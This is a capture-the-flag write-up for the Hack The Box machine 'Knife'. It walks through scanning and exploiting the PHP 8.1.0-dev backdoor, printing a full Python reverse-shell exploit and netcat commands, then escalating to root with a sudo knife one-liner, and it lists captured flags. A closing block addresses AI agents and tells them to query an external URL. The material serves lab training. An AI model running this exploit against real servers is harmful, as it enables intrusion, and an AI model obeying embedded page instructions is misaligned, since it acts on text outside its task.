# Knife
## TARGET IP: 10.10.10.242
## HOST IP: 10.10.16.3
## RECON
### WEBSITE
```url
http://[TARGET IP]
```
* The page seems like a typical medical page. The source code for the page doesn't have anything to note except for some javascript that takes care of the styling when you first log into the page.
* I'll also note that there are no links on this page or noted in the source code. Other than third-party links.
* Looks like we have a lot of good information from Wappalyzer.
* Apache Web Server V2.4.41
* Backend --> PHP v8.1.0
* This is the route we need to go with. It doesn't have it here but the version is v8.1.0dev
* OS --> Ubuntu
* After a quick google search, it appears that the Apache Web server has several vulnerabilities. Metasploit might even have a module to exploit it.
* From the Gobuster Scan below, I found a `/index.php` page.
* This is just the same home page.
*
### NMAP
```
nmap [TARGET IP]
```
```
nmap [TARGET IP] -A -p 22,80
```
* We can confirm that the Apache web Server is using V2.4.41
```
sudo nmap [TARGET IP] -sS -sV --script http-headers -p 80
```
### NIKTO
* First time using nikto here and interesting tool.
```
nikto 10.10.10.242
```
* This shows that the PHP version used is `8.1.0-dev`
* A quick google search shows that this is a development version of PHP and has a major [vulnerability](/htb/getting-started-notes.md).
*
## ENUMERATION
### GOBUSTER
```
gobuster dir -u http://[TARGET IP] -w /usr/share/dirb/wordlists/common.txt
```
```
gobuster dir -u http://[TARGET IP] -w /usr/share/dirb/wordlists/common.txt -x php
```
```
gobuster vhost -u http://[TARGET IP]/ -w /usr/share/dirb/wordlists/common.txt
```
## EXPLOITATION
* Let's dive into possible exploitations for the Apache version.
* The [Apache](https://httpd.apache.org/security/vulnerabilities_24.html) website actually has a list of all vulnerabilities which is really handy.
* Nothing sticks out specifically for this version but it looks like the version may still be susceptible to multiple attacks.
* I'm pretty sure this is not the route to go.
* Let's take a look
### METASPLOIT
* Tried a few exploits available but nothing really stuck.
* No luck here with Apache.
### PHP
* From the Nikto scan I found that the PHP version is 8.1.0-dev which has a major vulnerability that allows for a backdoor into the server.
* I found a really useful python [script](https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.py) that creates a reverse shell using this backdoor.
```python
# Exploit Title: PHP 8.1.0-dev Backdoor Remote Code Execution
# Date: 23 may 2021
# Exploit Author: flast101
# Vendor Homepage: https://www.php.net/
# Software Link:
# - https://hub.docker.com/r/phpdaily/php
# - https://github.com/phpdaily/php
# Version: 8.1.0-dev
# Tested on: Ubuntu 20.04
# CVE : N/A
# References:
# - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
# - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md
"""
Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.py
Contact: flast101.sec@gmail.com
An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
The following exploit uses the backdoor to provide a pseudo shell ont the host.
Usage:
python3 revshell_php_8.1.0-dev.py
"""
#!/usr/bin/env python3
import os, sys, argparse, requests
request = requests.Session()
def check_target(args):
response = request.get(args.url)
for header in response.headers.items():
if "PHP/8.1.0-dev" in header[1]:
return True
return False
def reverse_shell(args):
payload = 'bash -c \"bash -i >& /dev/tcp/' + args.lhost + '/' + args.lport + ' 0>&1\"'
injection = request.get(args.url, headers={"User-Agentt": "zerodiumsystem('" + payload + "');"}, allow_redirects = False)
def main():
parser = argparse.ArgumentParser(description="Get a reverse shell from PHP 8.1.0-dev backdoor. Set up a netcat listener in another shell: nc -nlvp ")
parser.add_argument("url", metavar='', help="Target URL")
parser.add_argument("lhost", metavar='', help="Attacker listening IP",)
parser.add_argument("lport", metavar='', help="Attacker listening port")
args = parser.parse_args()
if check_target(args):
reverse_shell(args)
else:
print("Host is not available or vulnerable, aborting...")
exit
if __name__ == "__main__":
main()
```
* I created a new file with the code snippet above and ran the following.
```
nc -lvnp 4444
```
```
python3 exploit.py http://[TARGET IP] [HOST IP] 4444
```
* Return back to your netcat listener and you should now have access to the system.
* Here is the user flag.
```
58a976dbd2240852f6910cab079cc7df
```
## PRIVILEGE ESCALATION
* Start with allowable sudo privileges.
```
sudo -l
```
* Let's go check out [GTFOBins](https://gtfobins.github.io/gtfobins/knife/#sudo) for a possible route to escalation.
```bash
sudo knife exec -E 'exec "/bin/sh"'
```
```
cat /root/root.txt
```
```
c0a6dfc2f007265b4eafecf32efebab9
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://sgtdiddlywink.gitbook.io/htb/machines/easy-machines/knife.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.